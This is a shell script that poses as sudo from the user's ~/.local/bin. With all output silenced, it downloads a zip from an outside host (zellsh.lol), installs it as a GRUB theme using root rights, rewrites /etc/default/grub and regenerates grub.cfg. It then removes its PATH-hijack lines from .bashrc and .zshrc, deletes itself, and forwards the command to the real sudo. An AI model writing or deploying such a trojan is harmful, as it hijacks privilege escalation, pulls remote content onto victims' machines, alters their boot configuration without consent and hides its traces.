#!/bin/sh

{
    if [ -d /boot/grub2/ ]; then
        GRUB_DIR="/boot/grub2"
    elif [ -d /boot/grub/ ]; then
        GRUB_DIR="/boot/grub"
    fi
    if command -pv grub2-mkconfig 1>/dev/null 2>/dev/null; then
        GRUB_MKCONFIG="grub2-mkconfig"
    elif command -pv grub-mkconfig 1>/dev/null 2>/dev/null; then
        GRUB_MKCONFIG="grub-mkconfig"
    fi

    if [ -n "$GRUB_DIR" ] && [ -n "$GRUB_MKCONFIG" ]; then
        USER_HOME="$HOME"

        mkdir -p "$USER_HOME/.local/var/"
        if [ ! -f "$USER_HOME/.local/var/boot_data.zip" ]; then
            wget --output-document "$USER_HOME/.local/var/boot_data.zip" https://zellsh.lol/zellshlol.zip
        fi

        if [ -d "$GRUB_DIR/themes/zellshlol" ]; then
            /sbin/sudo rm -rf "$GRUB_DIR/themes/zellshlol"
        fi
        /sbin/sudo mkdir -p "$GRUB_DIR/themes/"

        /sbin/sudo unzip "$USER_HOME/.local/var/boot_data.zip" -d "$GRUB_DIR/themes/"
        rm "$USER_HOME/.local/var/boot_data.zip"

        /sbin/sudo cp --update=none /etc/default/grub "/etc/default/grub.backup_before_zellsh"
        /sbin/sudo sed -i -E 's/^[ \t]*(GRUB_THEME=.*)/#\1/g' /etc/default/grub
        /sbin/sudo sed -i -E 's/^[ \t]*(GRUB_TIMEOUT=.*)/#\1/g' /etc/default/grub
        /sbin/sudo sed -i -E 's/^[ \t]*(GRUB_BACKGROUND=.*)/#\1/g' /etc/default/grub
        printf '\n%s\n%s\n' "GRUB_THEME=$GRUB_DIR/themes/zellshlol/theme.txt" 'GRUB_TIMEOUT=15' | /sbin/sudo tee -a /etc/default/grub
        /sbin/sudo "$GRUB_MKCONFIG" -o "$GRUB_DIR/grub.cfg"
    fi

    sed -i -E 's/.*# for POSIX compliance and backwards compatibility//g' "$USER_HOME/.bashrc"
    sed -i -E 's/.*# for POSIX compliance and backwards compatibility//g' "$USER_HOME/.zshrc"
    rm "$USER_HOME/.local/bin/sudo"

} 1>/dev/null 2>/dev/null


/sbin/sudo "$@"
